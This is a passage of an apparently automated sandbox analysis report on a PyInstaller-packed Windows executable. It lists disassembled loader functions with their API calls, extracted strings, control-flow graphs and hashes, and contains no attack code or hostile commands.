                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6029ADF2A,?,?,-00000018,00007FF6029A9BD3,?,?,?,00007FF6029A9ACA,?,?,?,00007FF6029A4F9E), ref: 00007FF6029ADD18
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                                            • Opcode ID: f65bba0801ac06b96f2f3a4d918bbe6eed0efd0f6f5c7edcd61ac98fb66de638
                                                                                                                                                                                                                            • Instruction ID: 37b8f41db3b582c36bb714a0148e73a103e7023c6195ff2381ec3a7a31354a43
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f65bba0801ac06b96f2f3a4d918bbe6eed0efd0f6f5c7edcd61ac98fb66de638
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E341E521F19B0241FB16CB1798005752BA1BF49BA8FA85135DD0DC7B86EFFDE8458390
                                                                                                                                                                                                                            Function 00007FF602997B90 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF602993834), ref: 00007FF602997C34
                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF602993834), ref: 00007FF602997C7C
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997D60: GetEnvironmentVariableW.KERNEL32(00007FF60299365F), ref: 00007FF602997D97
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997D60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF602997DB9
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A70B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029A70C9
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029926C0: MessageBoxW.USER32 ref: 00007FF602992736
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                            • API String ID: 740614611-1339014028
                                                                                                                                                                                                                            • Opcode ID: 1c5b6979b1331aa4fa2327e85b2148ecf31c35182d526a30fca54ffd08636c69
                                                                                                                                                                                                                            • Instruction ID: 2564563cf5da7d49b9a4b7835d0df9a80b270be2010a6f9454b4957c05495515
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c5b6979b1331aa4fa2327e85b2148ecf31c35182d526a30fca54ffd08636c69
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2941A051E2964349FA20EB6B95552F95A51EF89BACF704032EE0EC77D7EEBCE5008240
                                                                                                                                                                                                                            Function 00007FF6029AA8DC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 722 7ff6029aa8dc-7ff6029aa902 723 7ff6029aa904-7ff6029aa918 call 7ff6029a4124 call 7ff6029a4144 722->723 724 7ff6029aa91d-7ff6029aa921 722->724 738 7ff6029aad0e 723->738 725 7ff6029aacf7-7ff6029aad03 call 7ff6029a4124 call 7ff6029a4144 724->725 726 7ff6029aa927-7ff6029aa92e 724->726 745 7ff6029aad09 call 7ff6029a9760 725->745 726->725 729 7ff6029aa934-7ff6029aa962 726->729 729->725 732 7ff6029aa968-7ff6029aa96f 729->732 735 7ff6029aa971-7ff6029aa983 call 7ff6029a4124 call 7ff6029a4144 732->735 736 7ff6029aa988-7ff6029aa98b 732->736 735->745 741 7ff6029aa991-7ff6029aa997 736->741 742 7ff6029aacf3-7ff6029aacf5 736->742 743 7ff6029aad11-7ff6029aad28 738->743 741->742 746 7ff6029aa99d-7ff6029aa9a0 741->746 742->743 745->738 746->735 749 7ff6029aa9a2-7ff6029aa9c7 746->749 750 7ff6029aa9c9-7ff6029aa9cb 749->750 751 7ff6029aa9fa-7ff6029aaa01 749->751 753 7ff6029aa9f2-7ff6029aa9f8 750->753 754 7ff6029aa9cd-7ff6029aa9d4 750->754 755 7ff6029aaa03-7ff6029aaa2b call 7ff6029ac47c call 7ff6029a97c8 * 2 751->755 756 7ff6029aa9d6-7ff6029aa9ed call 7ff6029a4124 call 7ff6029a4144 call 7ff6029a9760 751->756 758 7ff6029aaa78-7ff6029aaa8f 753->758 754->753 754->756 783 7ff6029aaa48-7ff6029aaa73 call 7ff6029ab104 755->783 784 7ff6029aaa2d-7ff6029aaa43 call 7ff6029a4144 call 7ff6029a4124 755->784 787 7ff6029aab80 756->787 761 7ff6029aaa91-7ff6029aaa99 758->761 762 7ff6029aab0a-7ff6029aab14 call 7ff6029b269c 758->762 761->762 766 7ff6029aaa9b-7ff6029aaa9d 761->766 774 7ff6029aab9e 762->774 775 7ff6029aab1a-7ff6029aab2f 762->775 766->762 770 7ff6029aaa9f-7ff6029aaab5 766->770 770->762 776 7ff6029aaab7-7ff6029aaac3 770->776 778 7ff6029aaba3-7ff6029aabc3 ReadFile 774->778 775->774 780 7ff6029aab31-7ff6029aab43 GetConsoleMode 775->780 776->762 781 7ff6029aaac5-7ff6029aaac7 776->781 785 7ff6029aabc9-7ff6029aabd1 778->785 786 7ff6029aacbd-7ff6029aacc6 GetLastError 778->786 780->774 788 7ff6029aab45-7ff6029aab4d 780->788 781->762 782 7ff6029aaac9-7ff6029aaae1 781->782 782->762 789 7ff6029aaae3-7ff6029aaaef 782->789 783->758 784->787 785->786 791 7ff6029aabd7 785->791 794 7ff6029aace3-7ff6029aace6 786->794 795 7ff6029aacc8-7ff6029aacde call 7ff6029a4144 call 7ff6029a4124 786->795 796 7ff6029aab83-7ff6029aab8d call 7ff6029a97c8 787->796 788->778 793 7ff6029aab4f-7ff6029aab71 ReadConsoleW 788->793 789->762 798 7ff6029aaaf1-7ff6029aaaf3 789->798 802 7ff6029aabde-7ff6029aabf3 791->802 804 7ff6029aab92-7ff6029aab9c 793->804 805 7ff6029aab73 GetLastError 793->805 799 7ff6029aab79-7ff6029aab7b call 7ff6029a40b8 794->799 800 7ff6029aacec-7ff6029aacee 794->800 795->787 796->743 798->762 808 7ff6029aaaf5-7ff6029aab05 798->808 799->787 800->796 802->796 810 7ff6029aabf5-7ff6029aac00 802->810 804->802 805->799 808->762 815 7ff6029aac02-7ff6029aac1b call 7ff6029aa4f4 810->815 816 7ff6029aac27-7ff6029aac2f 810->816 822 7ff6029aac20-7ff6029aac22 815->822 819 7ff6029aac31-7ff6029aac43 816->819 820 7ff6029aacab-7ff6029aacb8 call 7ff6029aa334 816->820 823 7ff6029aac9e-7ff6029aaca6 819->823 824 7ff6029aac45 819->824 820->822 822->796 823->796 826 7ff6029aac4a-7ff6029aac51 824->826 827 7ff6029aac53-7ff6029aac57 826->827 828 7ff6029aac8d-7ff6029aac98 826->828 829 7ff6029aac73 827->829 830 7ff6029aac59-7ff6029aac60 827->830 828->823 832 7ff6029aac79-7ff6029aac89 829->832 830->829 831 7ff6029aac62-7ff6029aac66 830->831 831->829 833 7ff6029aac68-7ff6029aac71 831->833 832->826 834 7ff6029aac8b 832->834 833->832 834->823
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: 31d13e49edb6b77dcfdb248b250af955fe9e2782487ea0c538027bd5ccf0f89f
                                                                                                                                                                                                                            • Instruction ID: f51ee67aa6c762cfbae7636ece9a8f3a904258eae2979416ddc5c1b84ab09d76
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31d13e49edb6b77dcfdb248b250af955fe9e2782487ea0c538027bd5ccf0f89f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7C1BC22E0878692EB619B1694402BD3FB1EF91B98F754135DA4E87793CEFCE845C380
                                                                                                                                                                                                                            Function 00007FF602997AA0 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                                                                                            • Opcode ID: 68ffd57f6f0a9ecb9272feaa9a5a48b7ffc45862fed44bbf183e598809a34341
                                                                                                                                                                                                                            • Instruction ID: df881386eab03e55c47a3404cb7ae34dc1359f645cadbac16a19c65dddf9a896
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68ffd57f6f0a9ecb9272feaa9a5a48b7ffc45862fed44bbf183e598809a34341
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2216531A1C64646EB508B5AE58027AFBA1FF85BB8F200235D65D83BD6DFBCD4548704
                                                                                                                                                                                                                            Function 00007FF6029933E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF602993534), ref: 00007FF602993411
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029929E0: GetLastError.KERNEL32(?,?,?,00007FF60299342E,?,00007FF602993534), ref: 00007FF602992A14
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029929E0: FormatMessageW.KERNEL32(?,?,?,00007FF60299342E), ref: 00007FF602992A7D
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029929E0: MessageBoxW.USER32 ref: 00007FF602992ACF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                            • API String ID: 517058245-2863816727
                                                                                                                                                                                                                            • Opcode ID: 1891cfa551e3e280dc1046c601286eed7625d1f5967d42fe977e657d1173ede6
                                                                                                                                                                                                                            • Instruction ID: 0f5ce0ec48920a8e929dbf8d3c85f2ba0b632e84da81b70d54949d1742280080
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1891cfa551e3e280dc1046c601286eed7625d1f5967d42fe977e657d1173ede6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E321B210F1854258FA21DB2AE8113BA1B50FF493ACFA00136DA5DC25D7EEACE514C304
                                                                                                                                                                                                                            Function 00007FF602998160 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetCurrentProcess.KERNEL32 ref: 00007FF602997AC0
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: OpenProcessToken.ADVAPI32 ref: 00007FF602997AD3
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetTokenInformation.KERNELBASE ref: 00007FF602997AF8
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetLastError.KERNEL32 ref: 00007FF602997B02
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetTokenInformation.KERNELBASE ref: 00007FF602997B42
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF602997B5E
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: CloseHandle.KERNEL32 ref: 00007FF602997B76
                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF602993814), ref: 00007FF6029981EC
                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF602993814), ref: 00007FF6029981F5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                            • API String ID: 6828938-1529539262
                                                                                                                                                                                                                            • Opcode ID: f9793d74a1b5e7f4a379c0183be911e926cad6c50ec814a54247de32d6e53bda
                                                                                                                                                                                                                            • Instruction ID: b21214a01f55ea03cc9b48970e19f03a07b129cd4d520e8fd6af0c9e47bda314
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9793d74a1b5e7f4a379c0183be911e926cad6c50ec814a54247de32d6e53bda
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921A621A187425AF710AB16E9153FA6BA1FF88798FA44435E94DC3787DFBCD910C740
                                                                                                                                                                                                                            Function 00007FF602997480 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(00000000,?,00007FF60299324C,?,?,00007FF602993964), ref: 00007FF602997592
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                            • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                            • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                            • Opcode ID: f5e1d97ad3cffcf886cf29b6d4f35106126c927a68dae41295e748dc571d43dd
                                                                                                                                                                                                                            • Instruction ID: d45638a0e549f7fffc32c2255adeb0b49f8667c23f3eed40429705442ca1ac0e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5e1d97ad3cffcf886cf29b6d4f35106126c927a68dae41295e748dc571d43dd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C31FD61B29AC149FA619B26E4103FA6755FF48BF8F640231EE5D837CADE6CD611C700
                                                                                                                                                                                                                            Function 00007FF6029ABDE0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029ABDCB), ref: 00007FF6029ABEFC
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029ABDCB), ref: 00007FF6029ABF87
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                                            • Opcode ID: e6bfd2efc0a52da4c36f04384373f0d0d749ee2ea0ddd10696f55a8a1ad206f9
                                                                                                                                                                                                                            • Instruction ID: 0a939237cb53b981ec4db7f11c1aba64d76cec34c62a277ee3f7459a8acc7514
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6bfd2efc0a52da4c36f04384373f0d0d749ee2ea0ddd10696f55a8a1ad206f9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9291A362F0875285FB519F6A94502BD7FA0FF54B8CF344139DE0E96A86DEB8D481C780
                                                                                                                                                                                                                            Function 00007FF6029AE80C Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                                            • Opcode ID: 46fe6f423849a893ac5b0a676025a32ef6d1c72a5ebe1e9af569597a3fd54e58
                                                                                                                                                                                                                            • Instruction ID: e82bbfadb632805b902f72fed4262b03f22a8978b1a7f25fcc92c556f330c6de
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46fe6f423849a893ac5b0a676025a32ef6d1c72a5ebe1e9af569597a3fd54e58
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B51F472F047118AFB14CF29D9556BC2BA1BF5036CF604235DE5E92AE6DF7CA4028740
                                                                                                                                                                                                                            Function 00007FF6029A47DC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                                            • Opcode ID: 14ac654a1f32d047ab60f854177b8b741f58443d8c46fb4b5379a242353cab6e
                                                                                                                                                                                                                            • Instruction ID: 7f5c91999750d50c4934fd7ca13de7cf3835f22f201a04d27d49890afc744921
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14ac654a1f32d047ab60f854177b8b741f58443d8c46fb4b5379a242353cab6e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12517C22E087818AFB50DF76D4513BD2BA1BF88B5CF30A135DE499768ADFB8D4518381
                                                                                                                                                                                                                            Function 00007FF6029A4688 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
